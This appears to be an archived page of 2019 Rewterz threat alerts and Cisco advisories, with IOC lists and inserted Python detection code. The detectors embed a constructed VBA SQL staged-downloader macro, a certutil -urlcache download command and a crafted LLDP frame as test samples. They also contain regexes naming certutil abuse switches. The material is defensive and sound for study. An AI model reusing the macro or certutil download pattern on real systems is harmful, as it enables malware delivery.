Archive for September, 2019

Rewterz Threat Alert – New WhiteShadow Downloader Retrieves Malware Using Microsoft SQL

Severity

High

Analysis Summary

The use of Microsoft SQL queries to retrieve next-stage payloads has been relatively rare as a malware distribution technique. A new family of Microsoft Office macros that uses this tactic has been observed acting as a staged downloader, dubbed “WhiteShadow.” WhiteShadow keeps resurfacing in multiple campaigns with evolving evasion techniques.

[Image: example of one such campaign (whiteshadpicture1.png)]

When recipients open the malicious attachment and enable macros, WhiteShadow executes SQL queries against attacker-controlled Microsoft SQL Server databases and retrieves the next stage as an encoded string. The macro decodes that string and writes it to disk as a PKZip archive containing a Windows executable. The macro then extracts the archive and runs the executable, which installs the final malware; which payload is delivered is decided by the actor through the script configuration stored in the malicious Office attachment.

A series of malicious email campaigns distributing Microsoft Word and Microsoft Excel attachments containing the WhiteShadow Visual Basic macro has been observed. The infection chain is shown below.

[Image: WhiteShadow infection chain (image-1569842223.png)]
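The behaviour described above gives two cheap detection opportunities: an Office application has no reason to act as a Microsoft SQL client, and a macro that opens an ADODB connection, runs a SELECT, decodes the result and ends in Shell is the staged-downloader pattern. The following is an added example written for this page, not Rewterz code or the real WhiteShadow macro. The network-connection records are shaped like Sysmon Event ID 3, the process names, the 203.0.113.10 address and the VBA snippet are constructed, and only the three mssql.somee.com hostnames come from the IOC list above.

```python
"""Detection logic for WhiteShadow-style SQL staged downloaders.

Two checks that follow directly from the behaviour described above:
  1. An Office application has no business acting as a Microsoft SQL
     client. Flag network-connection events in which WINWORD/EXCEL
     opens an outbound connection to TCP/1433 (the MSSQL default port)
     or to one of the mssql.somee.com hosts from the IOC list.
  2. Static triage of extracted VBA source: a macro that opens an ADODB
     connection to SQL Server, runs a SELECT, decodes the result and
     ends in Shell is the staged-downloader pattern.

The events and the macro snippet below are constructed for this example.
"""
import re

OFFICE_PROCESSES = {"winword.exe", "excel.exe", "powerpnt.exe"}
MSSQL_PORT = 1433

# Hostnames copied from the IOC list above, with the defanging brackets removed.
IOC_HOSTS = {
    "antinio.mssql.somee.com",
    "bytesdata.mssql.somee.com",
    "fabancho.mssql.somee.com",
}


def office_mssql_connections(events):
    """Return events where an Office process talks to MSSQL or to an IOC host.

    Each event is a dict shaped like a Sysmon Event ID 3 (network connection)
    record: Image, DestinationHostname, DestinationPort, Initiated.
    """
    hits = []
    for ev in events:
        image = ev.get("Image", "").rsplit("\\", 1)[-1].lower()
        if image not in OFFICE_PROCESSES or not ev.get("Initiated", False):
            continue
        host = ev.get("DestinationHostname", "").lower().rstrip(".")
        port = int(ev.get("DestinationPort", 0))
        if port == MSSQL_PORT or host in IOC_HOSTS:
            hits.append(ev)
    return hits


# One regex per stage of the macro behaviour described in the alert.
VBA_STAGES = {
    "sql_client": re.compile(r"ADODB\.(Connection|Recordset)|Provider\s*=\s*SQLOLEDB", re.I),
    "sql_query": re.compile(r"\bSELECT\b.+\bFROM\b", re.I),
    "decode_loop": re.compile(r"\bChr\w*\s*\(", re.I),
    "write_zip": re.compile(r"\.zip\b", re.I),
    "execute": re.compile(r'\bShell\b|CreateObject\s*\(\s*"WScript\.Shell"', re.I),
}


def triage_vba(source):
    """Return the set of downloader stages found in a VBA source string."""
    return {name for name, rx in VBA_STAGES.items() if rx.search(source)}


def looks_like_sql_staged_downloader(source):
    """True when the macro is a SQL client, runs a query and executes something."""
    return {"sql_client", "sql_query", "execute"} <= triage_vba(source)


# Constructed sample telemetry: two Office processes talking to SQL Server,
# one legitimate service talking to an internal SQL Server, one Office HTTPS session.
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "DestinationHostname": "bytesdata.mssql.somee.com", "DestinationPort": 1433, "Initiated": True},
    {"Image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "DestinationHostname": "203.0.113.10", "DestinationPort": 1433, "Initiated": True},
    {"Image": r"C:\Windows\System32\svchost.exe",
     "DestinationHostname": "sql01.corp.example", "DestinationPort": 1433, "Initiated": True},
    {"Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "DestinationHostname": "www.example.com", "DestinationPort": 443, "Initiated": True},
]

# Constructed VBA in the shape the alert describes (not the real WhiteShadow macro).
SAMPLE_MACRO = r'''
Set cn = CreateObject("ADODB.Connection")
cn.Open "Provider=SQLOLEDB;Data Source=bytesdata.mssql.somee.com,1433;User ID=u;Password=p;"
Set rs = cn.Execute("SELECT body FROM stage WHERE id = 1")
For i = 1 To Len(rs(0)) Step 3
    s = s & Chr(Mid(rs(0), i, 3))
Next
Open Environ("TEMP") & "\a.zip" For Binary As #1
Put #1, , s
Close #1
Shell Environ("TEMP") & "\a.exe", vbHide
'''

if __name__ == "__main__":
    for ev in office_mssql_connections(SAMPLE_EVENTS):
        print("ALERT Office->MSSQL:", ev["Image"], ev["DestinationHostname"], ev["DestinationPort"])
    print("macro stages:", sorted(triage_vba(SAMPLE_MACRO)))
    print("SQL staged downloader:", looks_like_sql_staged_downloader(SAMPLE_MACRO))
```

The port check is deliberately independent of the IOC list: the hostnames rotate between campaigns, but an Office process opening TCP/1433 to anything outside your own SQL estate is abnormal on its own. The VBA triage is a first-pass filter for the macro dump from a tool such as olevba, not a substitute for detonating the document.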

Impact

  • Agent Tesla
  • AZORult
  • Crimson
  • Nanocore
  • njRat
  • Orion Logger
  • Remcos
  • Formbook

Indicators of Compromise

IP(s) / Hostname(s)

  • mundial2018[.]duckdns[.]org
  • www[.]5214zz[.]com
  • antinio[.]mssql[.]somee[.]com
  • robinmmadi[.]servehumour[.]com
  • halwachi50[.]mymediapc[.]net
  • bytesdata[.]mssql[.]somee[.]com
  • naddyto[.]warzonedns[.]com
  • www[.]wortexpharma[.]com
  • www[.]scaker[.]com
  • tslserv[.]duckdns[.]org
  • www[.]bilbord[.]site
  • fabancho[.]mssql[.]somee[.]com
  • jasoncarlosscot[.]dynu[.]net
  • 87[.]247[.]155[.]111
  • 193[.]111[.]155[.]137
  • 45[.]138[.]172[.]161
  • 185[.]157[.]79[.]115
  • 185[.]161[.]210[.]111
  • 185[.]161[.]209[.]183
  • 139[.]28[.]36[.]212
  • 79[.]134[.]225[.]77
  • 46[.]246[.]85[.]129
  • 51[.]254[.]228[.]144
  • 45[.]92[.]156[.]76
  • 193[.]228[.]53[.]0
  • 192[.]3[.]157[.]104

URLs

  • http[:]//rebrand[.]ly/purchaseorder54326
  • http[:]//rebrand[.]ly/813ed538169eeeethczfz2346577777777788kfvmdkf

Malware Hash (MD5/SHA1/SHA256)

  • 4b554367f8069f64201418cddcec82d7857dcc2573be7f0fb387c1b4802040b6
  • 5d7339e420e98c5730ac966e3f8099e3
  • 2ea787dfd65b0488b76b0a0a69ff2a632bb3bea3735ad007336b8dd1473f5768
  • c8892f7a5fdc48dddcec0e0da0d77842
  • a2b5168fb4b6a18d66571c6debc54f9f462f5b05a82313123feecc96dab0e595
  • 198161f222448d6c010d650f0f3725e3
  • c5193ba871414448c78cb516dfea622f2dbafa6bacb64e9d42c1769ebd4ffea3
  • 07faf2fc0e36a353f2b0a31dee587a18
  • fe88d40c56274a38ecd3a7178ac96970dd473c7ef3d0f54b5c8819f0b1fa41c3
  • dda4bb0c2c5bb7c1da6cd1845f6e50c0
  • a6a6b8c7cb72dd2670b6171576bc20c2f28198df12907b4d3ce010dcd97358e4
  • dcb035e6ea6d7af2adc72efd9b5e0593
  • bde269bf69582312c1ec76090991e7369e11dbee47a153af53e49528c8bd1b27
  • f7f0eda9b0db2c8427c1a2edb26bdb67
  • 0943a968cc9e00f83c0bb44685c67890c59ad7785db7fc12e9a0de8df309cbfa
  • 4b585be700825e0e4fbfa2d23f4e1306
  • b2c0b1535518321fbcde2c9d80f222e9477053e6ee505f2dd3b680277f80de1d
  • 8540a565ca9535779dcfba0f1e35a0d8
  • bd7abfaa0d3b1d315c2565c83c1003c229c700176c894752df11e6ecae7ad7e6
  • 5a13432e4f3e8afa4773662c3df457fd
  • 0e54bf9380d40d34e6a3029b6e2357f4af1738968646fdaa0c369a6700e158f4
  • 40345b441e5f547a364483f9cbaee208
  • 64c5d3f729d9a1ec26d5686002ccb0111ee9ba6a6a8e7da6ad31251f5d5dde6a
  • 61971b56add584c6ffdffc36dda8d00f
  • fcc8802b49bfb86d0cffb1cbc4f1b283887015b7da2263f9165a28f1b0f63f47
  • d397f71c280ad5b9a3342d36ff619a9f
  • 17742a3ca746f7f13aff1342068b2b78df413f0c9cd6cdd02d6df7699874a13a
  • 300f8518f18fe6c55f1f674e236e54f2
  • 4c487ba8dfded5d050d01ab656ef3916c5269551e51ed60f9cfa5995f55e3264
  • 2a6c94033d9f6ace23a4b0a24299375e
  • 35e81258c4365fb97ae57f3989164ed4e8b8e62668af9d281a57c5e7a70c288c
  • 00d02ec4503c664f6acf1bcbfb4c6971
  • ee0f3eb8a4d7c87a4c33a1f8b08e78bb95fa7ee41ddf0b07d9b6eabe87a33b2e
  • 69acb200963a9ba1fbcc700143d08756
  • ed8f4a7f09e428ceff8ede26102bb153b477b20775a0183be4ca2185999d20c8
  • b266aafb2b1036232b93373a44a256b5
  • acf9c1dda4a2076f0d503450db348ae2913345ebd134a3701baa2ff5ebaccd6e
  • e01bc1c85c19527494a73ab45d32684f
  • 95dbabe512ba4fc45e32786e87c292fb665e18bc0e2fea1cadb43ba1fe93f13b
  • b25ceb983ad0fa37e41cf1d4b0b6486a

Remediation

  • Block the threat indicators at their respective controls.
  • Do not download Word or Excel files attached to emails from untrusted sources.
  • Always scan files before opening or executing them.
  • Do not enable macros in files downloaded from untrusted sources.

Rewterz Threat Alert – Ongoing Njrat campaign against Middle East

Severity

Medium

Analysis Summary

This is an infection campaign that delivers several different threats. One of them is Vengeance Justice Worm, also known as Vjw0rm, which is written in JavaScript. It is malware that can act as a RAT and can also spread through removable drives, so it behaves as a worm, among other functions.

The second main threat is Hallaj Pro RAT, a modified version of the well-known njRAT Trojan, a .NET remote-control tool known since 2013 that has been seen on multiple occasions in campaigns against the Middle East.

Impact

Exposure of sensitive information

Indicators of Compromise

Malware Hash (MD5/SHA1/SHA256)

  • 1ad569e51149b42ad120ea602af449f8500c133c8c42914af8ecc0794dc83834
  • 476676f16cead94a1785c9fe0673c2698852e0bdfc2f8c75304602077e93b009
  • 4881d5b56d3157c2ceaa7783b77b26040379028c24a2e7209ecac93d6ef00801
  • 84e320b90e26db1102039c3f4310c0e59feed04b237c1a2a2561da4c27af2875
  • 880c26d7e48a0f2a61efcdba8dd47877b04f45475749a82b6fe82f90b6f2ad0f
  • a94b72bb15722c3d43789626f5f04d2e8a8637e2e7a659c57c6a13f6f9388adf
  • cbd3fc58b5c9c6a3933de8ecfb265b498d821357e564448185249e398ff8c128
  • ec8fad7f46a2cf0357698200f5a25abba84cdc0fda60ea4663aef8beeb147de6
  • f6c750b914d2a600955645fe6c6da9337f7e7744e74cf155faf23bfba640d7b7
  • 0c207afbce75fcf3e72ec67ba228a7ec62180720f8073b90e7e0dfea5157a27a
  • 51596728c9cb9144d157c5fc0e20d2bc8bbb3f60f98a56967b74e4a987be88a6
  • 60e3b5d728deee521b024db1af7a0964f1b758e9036d1cb16f73c969713c02e5
  • 6f748f450d2d4e7ef5b1e35e1bfeb7f0e28cc694ba6f32f92f2ebb69384edac6
  • 98d9182dcb8036d52ac1c1316cba153ae447333f84b51778b3e40a34bbda3583
  • 1b7e79186b8c29e83e04297c3f792dcf8fc2079d8ed6c96e80757085ddd63aa8
  • 9862c0ffa2d392c654986bd2b9a3f8a8fcc7208ec913f11971d2b8b2069d98cb
  • ba3d06afc59f391c76c8a115376e370f819200e9f54a07f64e2b4e5c7b24f442
  • c895f922b79616b3724006ca3e54c1369a5f0f6847293e729381b93621747a61

Remediation

  • Block all threat indicators at your respective controls.
  • Always be suspicious about emails sent by unknown senders.
  • Never click on the link/attachments sent by unknown senders.

Rewterz Threat Alert – Konni’s APT Group Runs Malspam Campaigns

Severity

Medium

Analysis Summary

The Konni APT group continues its attacks using malicious documents written in Russian, themed around Russian-North Korean trade and economic investment.

The attack vector is probably spear phishing, and the activity has been reported in Korea.

The malicious file suspected of being used as the attachment is named Russia-North Korea-South Korea-Trade and Economic Relations-Investment.doc


The malicious DOC file contains VBA code. If the user clicks the [Enable Content] button, the embedded VBA malware runs, and the document then displays decoy content so that it looks like a normal document file. The VBA code connects to the malicious C2 servers whose addresses are stored in the ObjectPool storage of the document: the attacker’s server is contacted through a combination of the instructions held in the ObjectPool objects TextBox1 to TextBox3. The content of object ‘_1629205277’ is hardcoded to communicate with the C2 server panda2019[.]eu5[.]org. The macro also copies the legitimate certutil.exe to a file named mx.exe and uses that copy to decode and execute the downloaded ‘1.txt’ file.
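Copying certutil.exe to mx.exe hides the name from command-line searches but not from telemetry that records the binary’s version resource: Sysmon Event ID 1 carries OriginalFileName, which still reads CertUtil.exe after a rename. The following detection is an added example for this page, not Rewterz code and not taken from the Konni macro. The process-creation records, the victim path and the example.invalid URL are constructed; the switch list is from certutil’s own documented options.

```python
"""Detection for the certutil abuse described above: the macro copies the
legitimate certutil.exe to mx.exe and uses that copy to decode a downloaded
text file into an executable. Renaming a binary does not change the
OriginalFileName in its version resource, which Sysmon Event ID 1 records,
so a process whose OriginalFileName is CertUtil.exe but whose image name is
something else is a strong signal. So is certutil run with -decode or
-urlcache by an Office parent. The event records below are constructed.
"""
import re

CERTUTIL = "certutil.exe"
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# certutil switches that turn it into a downloader or decoder.
ABUSE_SWITCHES = re.compile(r"(^|\s)-(decode|decodehex|urlcache|verifyctl|encode)\b", re.I)


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def classify_process_event(ev):
    """Return the list of reasons a Sysmon Event ID 1 record looks like certutil abuse."""
    image = _basename(ev.get("Image", ""))
    original = ev.get("OriginalFileName", "").lower()
    parent = _basename(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    if CERTUTIL not in (image, original):
        return []
    reasons = []
    if original == CERTUTIL and image != CERTUTIL:
        reasons.append(f"certutil renamed to {image}")
    m = ABUSE_SWITCHES.search(cmd)
    if m:
        reasons.append(f"certutil run with -{m.group(2).lower()}")
    if parent in OFFICE_PARENTS:
        reasons.append(f"spawned by Office application {parent}")
    return reasons


def find_certutil_abuse(events):
    """Pair each suspicious event with its reasons; benign certutil use is dropped."""
    results = []
    for ev in events:
        reasons = classify_process_event(ev)
        if reasons:
            results.append((ev, reasons))
    return results


TEMP = r"C:\Users\victim\AppData\Local\Temp"
SAMPLE_EVENTS = [  # constructed records in Sysmon Event ID 1 shape
    {"Image": TEMP + r"\mx.exe", "OriginalFileName": "CertUtil.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": f"{TEMP}\\mx.exe -decode {TEMP}\\1.txt {TEMP}\\1.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "certutil -verifystore MY"},
    {"Image": r"C:\Windows\System32\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "CommandLine": "certutil -urlcache -split -f http://example.invalid/1.txt 1.txt"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "OriginalFileName": "PowerShell.EXE", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -NoProfile"},
]

if __name__ == "__main__":
    for ev, reasons in find_certutil_abuse(SAMPLE_EVENTS):
        print("ALERT", ev["CommandLine"])
        for r in reasons:
            print("   -", r)
```

The second record (an administrator listing the personal certificate store) produces no reasons and is dropped, which is the false-positive case any certutil rule has to survive; the rename check and the Office-parent check each fire on their own, so a copy that is invoked with an unlisted switch or from a non-Office parent is still caught.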

Impact

Exposure of sensitive information

Indicators of Compromise

URLs

  • http[:]//handicap[.]eu5[.]org/1[.]txt
  • http[:]//handicap[.]eu5[.]org/4[.]txt
  • http[:]//handicap[.]eu5[.]org/3[.]txt
  • http[:]//clean[.]1apps[.]com/1[.]txt
  • http[:]//clean[.]1apps[.]com/3[.]txt
  • http[:]//panda2019[.]eu5[.]org/1[.]txt

Filename

Russia-North Korea-South Korea-Trade and Economic Relations-Investment.doc

Malware Hash (MD5/SHA1/SHA256)

  • ed63e84985e1af9c4764e6b6ca513ec1c16840fb2534b86f95e31801468be67a
  • 4c201f9949804e90f94fe91882cb8aad3e7daf496a7f4e792b9c7fed95ab0726
  • 8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd
  • 0c81b761f75047ccc4f41371fd8106d4

Remediation

  • Block all threat indicators at your respective controls.
  • Always be suspicious about emails sent by unknown senders.
  • Never click on the link/attachments sent by unknown senders.

Rewterz Threat Alert – Divergent: Fileless Malware Using NodeJS

Severity

Medium

Analysis Summary

A new malware loader is being used to deliver and infect systems with a previously undocumented payload called Divergent. The threat uses NodeJS, a runtime that executes JavaScript outside of a web browser, together with the legitimate open-source utility WinDivert, to implement some of Divergent’s functionality. NodeJS is not commonly seen across malware families.

The observed campaigns associated with Divergent use persistence techniques most commonly associated with “fileless” malware. The malware can be leveraged by an attacker to target corporate networks and appears to be designed primarily for click fraud; it shares several characteristics with other click-fraud malware such as Kovter.

Impact

Exposure of sensitive information

Indicators of Compromise

URLs

  • hxxps[:]//1292172017[.]rsc[.]cdn77[.]org/images/trpl[.]png
  • hxxps[:]//1292172017[.]rsc[.]cdn77[.]org/imtrack/strkp[.]png

Malware Hash (MD5/SHA1/SHA256)

  • ba04eacaa80bb5da6b02e1e7fdf3775cf5a44a6179b2c142605e089d78a2f5b6
  • a82dd93585094aeba4363c5aeedd1a85ef72c60a03738b25d452a5d895313875
  • 2f4a9ef2071ee896674e3da1a870d4efab4bb16e2e26ea3d7543d98b614ceab9
  • 77498f0ef4087175aa85ce1388f9d02d14aaf280e52ce7c70f50d3b8405fea9f
  • b2d29bb9350a0df93d0918c0208af081f917129ee46544508f2e1cf30aa4f4ce
  • bf2cdd1dc2e20c42d2451c83b8280490879b3515aa6c15ab297419990e017142
  • a7656ccba0946d25a4efd96f4f4576494d5f1e23e6ad2acc16d2e684656a2d4f
  • 607b2f3fd1e73788a4d6f5a366c708dbb12d174eba9863ade0af89ca40e1fdba

Remediation

  • Block all threat indicators at your respective controls.
  • Always be suspicious about emails sent by unknown senders.
  • Never click on the link/attachments sent by unknown senders.

Rewterz Threat Advisory – CVE-2019-1955 – Cisco Email Security Appliance Header Injection Vulnerability

Severity

Medium

Analysis Summary

The vulnerability is due to incomplete input validation of certain Sender Policy Framework (SPF) messages sent to an affected device. An attacker could exploit it by sending a crafted SPF message to the device. A successful exploit could allow the attacker to bypass the header filters configured on the device, which could let malicious content pass through it.

Impact

Security bypass

Affected Vendors

Cisco

Affected Products

Cisco AsyncOS Software prior to 4.0MR1

Remediation

Please see vendor’s advisory for more details.

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190807-esm-inject


Rewterz Threat Advisory – CVE-2019-1901 – Cisco Nexus 9000 Series Buffer Overflow Vulnerability

Severity

High

Analysis Summary

The vulnerability is due to improper input validation of certain type, length, value (TLV) fields of the LLDP frame header. An attacker could exploit this vulnerability by sending a crafted LLDP packet to the targeted device. A successful exploit may lead to a buffer overflow condition that could either cause a DoS condition or allow the attacker to execute arbitrary code with root privileges.
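The flaw class here is a parser trusting the length field of a TLV and copying that many bytes regardless of how many actually remain in the frame. The parser below is an added example for this page, not Cisco code and not a reconstruction of the NX-OS bug: it decodes the LLDP TLV list from a constructed Ethernet frame and rejects any TLV whose declared length runs past the end of the received data, which is the check whose absence turns a crafted packet into an overflow. Frame contents, MAC addresses and the port name are constructed.

```python
"""Strict LLDP TLV parsing: every length field is checked against the bytes
actually received before the value is touched. Constructed frames only.

LLDP TLV header (2 bytes, network order): 7-bit type, 9-bit length, then
`length` bytes of value. The PDU starts with Chassis ID (1), Port ID (2)
and TTL (3) and ends with an End TLV (type 0, length 0).
"""
import struct

LLDP_ETHERTYPE = 0x88CC
TLV_END, TLV_CHASSIS_ID, TLV_PORT_ID, TLV_TTL, TLV_SYSTEM_NAME = 0, 1, 2, 3, 5


class LldpError(ValueError):
    """Raised for any frame that must not be processed further."""


def parse_lldp_tlvs(frame):
    """Return [(type, value_bytes), ...] for a well-formed LLDP frame, else raise."""
    if len(frame) < 14:
        raise LldpError("truncated Ethernet header")
    if struct.unpack("!H", frame[12:14])[0] != LLDP_ETHERTYPE:
        raise LldpError("not an LLDP frame")
    pdu = frame[14:]
    tlvs, off = [], 0
    while True:
        if off + 2 > len(pdu):
            raise LldpError("TLV header runs past end of frame (missing End TLV?)")
        hdr = struct.unpack("!H", pdu[off:off + 2])[0]
        ttype, tlen = hdr >> 9, hdr & 0x1FF
        off += 2
        # The check that matters: never trust the declared length on its own.
        if off + tlen > len(pdu):
            raise LldpError(f"TLV type {ttype} declares {tlen} bytes, only {len(pdu) - off} remain")
        value = pdu[off:off + tlen]
        off += tlen
        if ttype == TLV_END:
            if tlen != 0:
                raise LldpError("End TLV must have length 0")
            break
        tlvs.append((ttype, value))
    if [t for t, _ in tlvs[:3]] != [TLV_CHASSIS_ID, TLV_PORT_ID, TLV_TTL]:
        raise LldpError("mandatory TLVs missing or out of order")
    return tlvs


def is_well_formed(frame):
    try:
        parse_lldp_tlvs(frame)
        return True
    except LldpError:
        return False


def build_tlv(ttype, value):
    """Encode one TLV; type is 7 bits, length 9 bits."""
    if not 0 <= ttype < 128 or not 0 <= len(value) < 512:
        raise ValueError("TLV type or length out of range")
    return struct.pack("!H", (ttype << 9) | len(value)) + value


def build_lldp_frame(tlvs, src=b"\x00\x11\x22\x33\x44\x55"):
    dst = b"\x01\x80\xc2\x00\x00\x0e"  # LLDP nearest-bridge multicast address
    return dst + src + struct.pack("!H", LLDP_ETHERTYPE) + b"".join(tlvs) + build_tlv(TLV_END, b"")


# Constructed well-formed advertisement from a hypothetical switch.
GOOD_FRAME = build_lldp_frame([
    build_tlv(TLV_CHASSIS_ID, b"\x04" + b"\x00\x11\x22\x33\x44\x55"),  # subtype 4: MAC address
    build_tlv(TLV_PORT_ID, b"\x05" + b"Ethernet1/1"),                  # subtype 5: interface name
    build_tlv(TLV_TTL, struct.pack("!H", 120)),
    build_tlv(TLV_SYSTEM_NAME, b"nexus-lab"),
])

# Constructed crafted frame: the Port ID header claims 511 bytes while only five follow.
CRAFTED_FRAME = (GOOD_FRAME[:14]
                 + build_tlv(TLV_CHASSIS_ID, b"\x04" + b"\x00\x11\x22\x33\x44\x55")
                 + struct.pack("!H", (TLV_PORT_ID << 9) | 0x1FF) + b"\x05AAAA"
                 + build_tlv(TLV_END, b""))

if __name__ == "__main__":
    for ttype, value in parse_lldp_tlvs(GOOD_FRAME):
        print(f"type {ttype:2d} len {len(value):3d} {value!r}")
    print("crafted frame accepted:", is_well_formed(CRAFTED_FRAME))
```

A C implementation that did `memcpy(buf, p, tlen)` into a fixed-size buffer without the `off + tlen > len(pdu)` comparison (and a second comparison against the size of `buf`) is the shape of bug the advisory describes; the same two comparisons belong in any parser of a length-prefixed wire format, whatever the language.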

Impact

  • Denial of service
  • Arbitrary code execution with root privileges

Affected Vendors

Cisco

Remediation

Please see the vendor’s advisory for the list of affected products and more details.

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190731-nxos-bo


Copyright © Rewterz. All rights reserved.